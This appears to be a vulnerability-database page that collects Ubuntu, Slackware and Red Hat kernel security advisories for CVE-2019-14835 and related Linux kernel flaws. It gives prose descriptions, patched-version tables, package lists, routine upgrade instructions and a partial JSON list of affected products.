It was discovered that the PowerPC dlpar implementation in the Linux kernel did not properly check for allocation errors in some situations. A local attacker could possibly use this to cause a denial of service (system crash). (CVE-2019-12614)

It was discovered that the floppy driver in the Linux kernel did not properly validate meta data, leading to a buffer overread. A local attacker could use this to cause a denial of service (system crash). (CVE-2019-14283)

It was discovered that the floppy driver in the Linux kernel did not properly validate ioctl() calls, leading to a division-by-zero. A local attacker could use this to cause a denial of service (system crash). (CVE-2019-14284)

Wen Huang discovered that the Marvell Wi-Fi device driver in the Linux kernel did not properly perform bounds checking, leading to a heap overflow. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2019-14814)

Wen Huang discovered that the Marvell Wi-Fi device driver in the Linux kernel did not properly perform bounds checking, leading to a heap overflow. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2019-14815)

Wen Huang discovered that the Marvell Wi-Fi device driver in the Linux kernel did not properly perform bounds checking, leading to a heap overflow. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2019-14816)

Matt Delco discovered that the KVM hypervisor implementation in the Linux kernel did not properly perform bounds checking when handling coalesced MMIO write operations. A local attacker with write access to /dev/kvm could use this to cause a denial of service (system crash). (CVE-2019-14821)

Peter Pi discovered a buffer overflow in the virtio network backend (vhost_net) implementation in the Linux kernel. (CVE-2019-14835)

Update instructions:

The problem can be corrected by updating your livepatches to the following versions:

| Kernel | Version | flavors | |--------------------------+----------+--------------------------| | 4.4.0-148.174 | 58.1 | lowlatency, generic | | 4.4.0-148.174~14.04.1 | 58.1 | lowlatency, generic | | 4.4.0-150.176 | 58.1 | generic, lowlatency | | 4.4.0-150.176~14.04.1 | 58.1 | lowlatency, generic | | 4.4.0-151.178 | 58.1 | lowlatency, generic | | 4.4.0-151.178~14.04.1 | 58.1 | generic, lowlatency | | 4.4.0-154.181 | 58.1 | lowlatency, generic | | 4.4.0-154.181~14.04.1 | 58.1 | generic, lowlatency | | 4.4.0-157.185 | 58.1 | lowlatency, generic | | 4.4.0-157.185~14.04.1 | 58.1 | generic, lowlatency | | 4.4.0-159.187 | 58.1 | lowlatency, generic | | 4.4.0-159.187~14.04.1 | 58.1 | generic, lowlatency | | 4.4.0-161.189 | 58.1 | lowlatency, generic | | 4.4.0-161.189~14.04.1 | 58.1 | lowlatency, generic | | 4.4.0-164.192 | 58.1 | lowlatency, generic | | 4.4.0-164.192~14.04.1 | 58.1 | lowlatency, generic | | 4.4.0-165.193 | 58.1 | generic, lowlatency | | 4.4.0-1083.93 | 58.1 | aws | | 4.4.0-1084.94 | 58.1 | aws | | 4.4.0-1085.96 | 58.1 | aws | | 4.4.0-1087.98 | 58.1 | aws | | 4.4.0-1088.99 | 58.1 | aws | | 4.4.0-1090.101 | 58.1 | aws | | 4.4.0-1092.103 | 58.1 | aws | | 4.4.0-1094.105 | 58.1 | aws | | 4.15.0-50.54 | 58.1 | generic, lowlatency | | 4.15.0-50.54~16.04.1 | 58.1 | generic, lowlatency | | 4.15.0-51.55 | 58.1 | generic, lowlatency | | 4.15.0-51.55~16.04.1 | 58.1 | generic, lowlatency | | 4.15.0-52.56 | 58.1 | lowlatency, generic | | 4.15.0-52.56~16.04.1 | 58.1 | generic, lowlatency | | 4.15.0-54.58 | 58.1 | generic, lowlatency | | 4.15.0-54.58~16.04.1 | 58.1 | generic, lowlatency | | 4.15.0-55.60 | 58.1 | generic, lowlatency | | 4.15.0-58.64 | 58.1 | generic, lowlatency | | 4.15.0-58.64~16.04.1 | 58.1 | lowlatency, generic | | 4.15.0-60.67 | 58.1 | lowlatency, generic | | 4.15.0-60.67~16.04.1 | 58.1 | generic, lowlatency | | 4.15.0-62.69 | 58.1 | generic, lowlatency | | 4.15.0-62.69~16.04.1 | 58.1 | lowlatency, generic | | 4.15.0-64.73 | 58.1 | generic, lowlatency | | 4.15.0-64.73~16.04.1 | 58.1 | lowlatency, generic | | 4.15.0-65.74 | 58.1 | lowlatency, generic | | 4.15.0-1038.43 | 58.1 | oem | | 4.15.0-1039.41 | 58.1 | aws | | 4.15.0-1039.44 | 58.1 | oem | | 4.15.0-1040.42 | 58.1 | aws | | 4.15.0-1041.43 | 58.1 | aws | | 4.15.0-1043.45 | 58.1 | aws | | 4.15.0-1043.48 | 58.1 | oem | | 4.15.0-1044.46 | 58.1 | aws | | 4.15.0-1045.47 | 58.1 | aws | | 4.15.0-1045.50 | 58.1 | oem | | 4.15.0-1047.49 | 58.1 | aws | | 4.15.0-1047.51 | 58.1 | azure | | 4.15.0-1048.50 | 58.1 | aws | | 4.15.0-1049.54 | 58.1 | azure | | 4.15.0-1050.52 | 58.1 | aws | | 4.15.0-1050.55 | 58.1 | azure | | 4.15.0-1050.57 | 58.1 | oem | | 4.15.0-1051.53 | 58.1 | aws | | 4.15.0-1051.56 | 58.1 | azure | | 4.15.0-1052.57 | 58.1 | azure | | 4.15.0-1055.60 | 58.1 | azure | | 4.15.0-1056.61 | 58.1 | azure | | 4.15.0-1056.65 | 58.1 | oem | | 4.15.0-1057.62 | 58.1 | azure | | 4.15.0-1057.66 | 58.1 | oem | | 4.15.0-1059.64 | 58.1 | azure | | 5.0.0-1014.14~18.04.1 | 58.1 | azure | | 5.0.0-1016.17~18.04.1 | 58.1 | azure | | 5.0.0-1018.19~18.04.1 | 58.1 | azure | | 5.0.0-1020.21~18.04.1 | 58.1 | azure |

Support Information:

Kernels older than the levels listed below do not receive livepatch updates. Please upgrade your kernel as soon as possible.

| Series | Version | Flavors | |------------------+------------------+--------------------------| | Ubuntu 18.04 LTS | 4.15.0-1039 | aws | | Ubuntu 16.04 LTS | 4.4.0-1083 | aws | | Ubuntu 18.04 LTS | 5.0.0-1000 | azure | | Ubuntu 16.04 LTS | 4.15.0-1047 | azure | | Ubuntu 18.04 LTS | 4.15.0-50 | generic lowlatency | | Ubuntu 16.04 LTS | 4.15.0-50 | generic lowlatency | | Ubuntu 14.04 LTS | 4.4.0-148 | generic lowlatency | | Ubuntu 18.04 LTS | 4.15.0-1038 | oem | | Ubuntu 16.04 LTS | 4.4.0-148 | generic lowlatency |

References: CVE-2016-10905, CVE-2018-20856, CVE-2018-20961, CVE-2018-20976, CVE-2018-21008, CVE-2019-0136, CVE-2019-2054, CVE-2019-2181, CVE-2019-3846, CVE-2019-10126, CVE-2019-10207, CVE-2019-11477, CVE-2019-11478, CVE-2019-11833, CVE-2019-12614, CVE-2019-14283, CVE-2019-14284, CVE-2019-14814, CVE-2019-14815, CVE-2019-14816, CVE-2019-14821, CVE-2019-14835

-- ubuntu-security-announce mailing list ubuntu-security-announce@lists.ubuntu.com Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce .

Here are the details from the Slackware 14.2 ChangeLog: +--------------------------+ patches/packages/linux-4.4.199/: Upgraded. These updates fix various bugs and security issues. If you use lilo to boot your machine, be sure lilo.conf points to the correct kernel and initrd and run lilo as root to update the bootloader. If you use elilo to boot your machine, you should run eliloconfig to copy the kernel and initrd to the EFI System Partition. For more information, see: Fixed in 4.4.191: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3900 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15118 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10906 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10905 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10638 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15117 Fixed in 4.4.193: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14835 Fixed in 4.4.194: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14816 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14814 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15505 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14821 Fixed in 4.4.195: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17053 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17052 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17056 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17055 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17054 Fixed in 4.4.196: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2215 Fixed in 4.4.197: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16746 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20976 Fixed in 4.4.198: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17075 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17133 Fixed in 4.4.199: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15098 ( Security fix *) +--------------------------+

Where to find the new packages: +-----------------------------+

Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)

Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.

Updated packages for Slackware 14.2: ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-generic-4.4.199-i586-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-generic-smp-4.4.199_smp-i686-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-headers-4.4.199_smp-x86-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-huge-4.4.199-i586-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-huge-smp-4.4.199_smp-i686-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-modules-4.4.199-i586-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-modules-smp-4.4.199_smp-i686-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-source-4.4.199_smp-noarch-1.txz

Updated packages for Slackware x86_64 14.2: ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.199/kernel-generic-4.4.199-x86_64-1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.199/kernel-headers-4.4.199-x86-1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.199/kernel-huge-4.4.199-x86_64-1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.199/kernel-modules-4.4.199-x86_64-1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.199/kernel-source-4.4.199-noarch-1.txz

MD5 signatures: +-------------+

Slackware 14.2 packages:

0e523f42e759ecc2399f36e37672f110 kernel-generic-4.4.199-i586-1.txz ee6451f5362008b46fee2e08e3077b21 kernel-generic-smp-4.4.199_smp-i686-1.txz a8338ef88f2e3ea9c74d564c36ccd420 kernel-headers-4.4.199_smp-x86-1.txz cd9e9c241e4eec2fba1dae658a28870e kernel-huge-4.4.199-i586-1.txz 842030890a424023817d42a83a86a7f4 kernel-huge-smp-4.4.199_smp-i686-1.txz 257db024bb4501548ac9118dbd2d9ae6 kernel-modules-4.4.199-i586-1.txz 96377cbaf7bca55aaca70358c63151a7 kernel-modules-smp-4.4.199_smp-i686-1.txz 0673e86466f9e624964d95107cf6712f kernel-source-4.4.199_smp-noarch-1.txz

Slackware x86_64 14.2 packages: 6d1ff428e7cad6caa8860acc402447a1 kernel-generic-4.4.199-x86_64-1.txz dadc091dc725b8227e0d1e35098d6416 kernel-headers-4.4.199-x86-1.txz f5f4c034203f44dd1513ad3504c42515 kernel-huge-4.4.199-x86_64-1.txz a5337cd8b2ca80d4d93b9e9688e42b03 kernel-modules-4.4.199-x86_64-1.txz 5dd6e46c04f37b97062dc9e52cc38add kernel-source-4.4.199-noarch-1.txz

Installation instructions: +------------------------+

Upgrade the packages as root:

upgradepkg kernel-*.txz

If you are using an initrd, you'll need to rebuild it.

For a 32-bit SMP machine, use this command (substitute the appropriate kernel version if you are not running Slackware 14.2):

/usr/share/mkinitrd/mkinitrd_command_generator.sh -k 4.4.199-smp | bash

For a 64-bit machine, or a 32-bit uniprocessor machine, use this command (substitute the appropriate kernel version if you are not running Slackware 14.2):

/usr/share/mkinitrd/mkinitrd_command_generator.sh -k 4.4.199 | bash

Please note that "uniprocessor" has to do with the kernel you are running, not with the CPU. Most systems should run the SMP kernel (if they can) regardless of the number of cores the CPU has. If you aren't sure which kernel you are running, run "uname -a". If you see SMP there, you are running the SMP kernel and should use the 4.4.199-smp version when running mkinitrd_command_generator. Note that this is only for 32-bit -- 64-bit systems should always use 4.4.199 as the version.

If you are using lilo or elilo to boot the machine, you'll need to ensure that the machine is properly prepared before rebooting.

If using LILO: By default, lilo.conf contains an image= line that references a symlink that always points to the correct kernel. No editing should be required unless your machine uses a custom lilo.conf. If that is the case, be sure that the image= line references the correct kernel file. Either way, you'll need to run "lilo" as root to reinstall the boot loader.

If using elilo: Ensure that the /boot/vmlinuz symlink is pointing to the kernel you wish to use, and then run eliloconfig to update the EFI System Partition.

+-----+

Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com

+------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address. 7) - aarch64, noarch, ppc64le

  1. These packages include redhat-release-virtualization-host, ovirt-node, and rhev-hypervisor. RHVH features a Cockpit user interface for monitoring the host's resources and performing administrative tasks.

The following packages have been upgraded to a later upstream version: redhat-release-virtualization-host (4.2), redhat-virtualization-host (4.2). -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256

====================================================================
Red Hat Security Advisory

Synopsis: Important: kernel security update Advisory ID: RHSA-2019:2867-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2019:2867 Issue date: 2019-09-23 CVE Names: CVE-2019-14835 ==================================================================== 1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 7.4 Advanced Update Support, Red Hat Enterprise Linux 7.4 Telco Extended Update Support, and Red Hat Enterprise Linux 7.4 Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

  1. Relevant releases/architectures:

Red Hat Enterprise Linux Server AUS (v. 7.4) - noarch, x86_64 Red Hat Enterprise Linux Server E4S (v. 7.4) - noarch, ppc64le, x86_64 Red Hat Enterprise Linux Server Optional AUS (v. 7.4) - x86_64 Red Hat Enterprise Linux Server Optional E4S (v. 7.4) - ppc64le, x86_64 Red Hat Enterprise Linux Server Optional TUS (v. 7.4) - x86_64 Red Hat Enterprise Linux Server TUS (v. 7.4) - noarch, x86_64

  1. (CVE-2019-14835)

  2. Solution:

For details on how to apply this update, which includes the changes described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

  1. Bugs fixed (https://bugzilla.redhat.com/):

1750727 - CVE-2019-14835 kernel: vhost-net: guest to host kernel escape during migration

  1. Package List:

Red Hat Enterprise Linux Server AUS (v. 7.4):

Source: kernel-3.10.0-693.59.1.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-693.59.1.el7.noarch.rpm kernel-doc-3.10.0-693.59.1.el7.noarch.rpm

x86_64: kernel-3.10.0-693.59.1.el7.x86_64.rpm kernel-debug-3.10.0-693.59.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-693.59.1.el7.x86_64.rpm kernel-debug-devel-3.10.0-693.59.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-693.59.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-693.59.1.el7.x86_64.rpm kernel-devel-3.10.0-693.59.1.el7.x86_64.rpm kernel-headers-3.10.0-693.59.1.el7.x86_64.rpm kernel-tools-3.10.0-693.59.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-693.59.1.el7.x86_64.rpm kernel-tools-libs-3.10.0-693.59.1.el7.x86_64.rpm perf-3.10.0-693.59.1.el7.x86_64.rpm perf-debuginfo-3.10.0-693.59.1.el7.x86_64.rpm python-perf-3.10.0-693.59.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-693.59.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server E4S (v. 7.4):

Source: kernel-3.10.0-693.59.1.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-693.59.1.el7.noarch.rpm kernel-doc-3.10.0-693.59.1.el7.noarch.rpm

ppc64le: kernel-3.10.0-693.59.1.el7.ppc64le.rpm kernel-bootwrapper-3.10.0-693.59.1.el7.ppc64le.rpm kernel-debug-3.10.0-693.59.1.el7.ppc64le.rpm kernel-debug-debuginfo-3.10.0-693.59.1.el7.ppc64le.rpm kernel-debuginfo-3.10.0-693.59.1.el7.ppc64le.rpm kernel-debuginfo-common-ppc64le-3.10.0-693.59.1.el7.ppc64le.rpm kernel-devel-3.10.0-693.59.1.el7.ppc64le.rpm kernel-headers-3.10.0-693.59.1.el7.ppc64le.rpm kernel-tools-3.10.0-693.59.1.el7.ppc64le.rpm kernel-tools-debuginfo-3.10.0-693.59.1.el7.ppc64le.rpm kernel-tools-libs-3.10.0-693.59.1.el7.ppc64le.rpm perf-3.10.0-693.59.1.el7.ppc64le.rpm perf-debuginfo-3.10.0-693.59.1.el7.ppc64le.rpm python-perf-3.10.0-693.59.1.el7.ppc64le.rpm python-perf-debuginfo-3.10.0-693.59.1.el7.ppc64le.rpm

x86_64: kernel-3.10.0-693.59.1.el7.x86_64.rpm kernel-debug-3.10.0-693.59.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-693.59.1.el7.x86_64.rpm kernel-debug-devel-3.10.0-693.59.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-693.59.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-693.59.1.el7.x86_64.rpm kernel-devel-3.10.0-693.59.1.el7.x86_64.rpm kernel-headers-3.10.0-693.59.1.el7.x86_64.rpm kernel-tools-3.10.0-693.59.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-693.59.1.el7.x86_64.rpm kernel-tools-libs-3.10.0-693.59.1.el7.x86_64.rpm perf-3.10.0-693.59.1.el7.x86_64.rpm perf-debuginfo-3.10.0-693.59.1.el7.x86_64.rpm python-perf-3.10.0-693.59.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-693.59.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server TUS (v. 7.4):

Source: kernel-3.10.0-693.59.1.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-693.59.1.el7.noarch.rpm kernel-doc-3.10.0-693.59.1.el7.noarch.rpm

x86_64: kernel-3.10.0-693.59.1.el7.x86_64.rpm kernel-debug-3.10.0-693.59.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-693.59.1.el7.x86_64.rpm kernel-debug-devel-3.10.0-693.59.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-693.59.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-693.59.1.el7.x86_64.rpm kernel-devel-3.10.0-693.59.1.el7.x86_64.rpm kernel-headers-3.10.0-693.59.1.el7.x86_64.rpm kernel-tools-3.10.0-693.59.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-693.59.1.el7.x86_64.rpm kernel-tools-libs-3.10.0-693.59.1.el7.x86_64.rpm perf-3.10.0-693.59.1.el7.x86_64.rpm perf-debuginfo-3.10.0-693.59.1.el7.x86_64.rpm python-perf-3.10.0-693.59.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-693.59.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server Optional AUS (v. 7.4):

x86_64: kernel-debug-debuginfo-3.10.0-693.59.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-693.59.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-693.59.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-693.59.1.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-693.59.1.el7.x86_64.rpm perf-debuginfo-3.10.0-693.59.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-693.59.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server Optional E4S (v. 7.4):

ppc64le: kernel-debug-debuginfo-3.10.0-693.59.1.el7.ppc64le.rpm kernel-debug-devel-3.10.0-693.59.1.el7.ppc64le.rpm kernel-debuginfo-3.10.0-693.59.1.el7.ppc64le.rpm kernel-debuginfo-common-ppc64le-3.10.0-693.59.1.el7.ppc64le.rpm kernel-tools-debuginfo-3.10.0-693.59.1.el7.ppc64le.rpm kernel-tools-libs-devel-3.10.0-693.59.1.el7.ppc64le.rpm perf-debuginfo-3.10.0-693.59.1.el7.ppc64le.rpm python-perf-debuginfo-3.10.0-693.59.1.el7.ppc64le.rpm

x86_64: kernel-debug-debuginfo-3.10.0-693.59.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-693.59.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-693.59.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-693.59.1.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-693.59.1.el7.x86_64.rpm perf-debuginfo-3.10.0-693.59.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-693.59.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server Optional TUS (v. 7.4):

x86_64: kernel-debug-debuginfo-3.10.0-693.59.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-693.59.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-693.59.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-693.59.1.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-693.59.1.el7.x86_64.rpm perf-debuginfo-3.10.0-693.59.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-693.59.1.el7.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

  1. References:

https://access.redhat.com/security/cve/CVE-2019-14835 https://access.redhat.com/security/updates/classification/#important https://access.redhat.com/security/vulnerabilities/kernel-vhost

  1. Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

Copyright 2019 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1

iQIVAwUBXYi86tzjgjWX9erEAQi1YA//SFbLNTK8xgMJM4UXWUDM7d1LMS/f79kZ C+qG3/+OUqyltICprPUpLQOslAaLgY1C1slkqkxXXgNtfB4rBnE2gkDtSnqe0a7K 60JapVVCpXuJnGozoFusUPgSvy7DM3RJ+xcz4SS6fNIuRGq1bDjOd4E3tcQwk1rh hqqPwPmY1uJK2y6UWiyF9Q2Dvug5mO2ZKqxgwuZPQyRXg14BVxDfXIY6+8SuuL3j YLVmCNqpErcoqeIaUAXUbGyATrUwni8J1RY4Q5lNDMq8u31Xlu/CSaEqU5OxtkeB RvfAuFebnJkUo+YkzouWWKF+eTEhpqxXnPZq2KM8zStGmRpVmreg16THa6CSpi81 HDcsTNKFHsA3QWHosxramg1Z/RYSD+goD0lvnfEVvO4jaUW2f59q2PEu4riM897f L21luddDijVBYmzAngkrhKR0kiADLmU+p67nZ9EyNrR95XYaaJ6GRb5vSXBEgiXt vJJn8GuJAI5h13MzO5rAua82xTHxiQc28s5KCbCJFcp3DZo72mDIVE6MfGb1By5e T1IN17xPN7yVoy/c8WZ89unoNZNXMsTBhcWNNlXsXknALVaYi5i4AtWx3mOLP2gk c1Z7F9XG8niCTGSLvBs5gSAfjSFNB6YiU6NzX9Zlxb4/hr3HE20S+w3AGnvD2f05 hz6LDDCc4xc=hk2d -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201909-0695",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "h300e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "enterprise linux workstation",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.0"
      },
      {
        "model": "h300s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.9.193"
      },
      {
        "model": "aff a700s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "h410c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "30"
      },
      {
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.6"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.2"
      },
      {
        "model": "enterprise linux eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.5"
      },
      {
        "model": "manageone",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "6.5.1rc1.b060"
      },
      {
        "model": "openshift container platform",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "3.11"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "14.04"
      },
      {
        "model": "imanager neteco",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "v600r009c10spc200"
      },
      {
        "model": "enterprise linux eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.6"
      },
      {
        "model": "h700e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.7"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "8.0"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "12.04"
      },
      {
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.0"
      },
      {
        "model": "steelstore cloud integrated storage",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "hci management node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "leap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "opensuse",
        "version": "15.0"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.4"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.0"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.9"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.2"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.14.144"
      },
      {
        "model": "manageone",
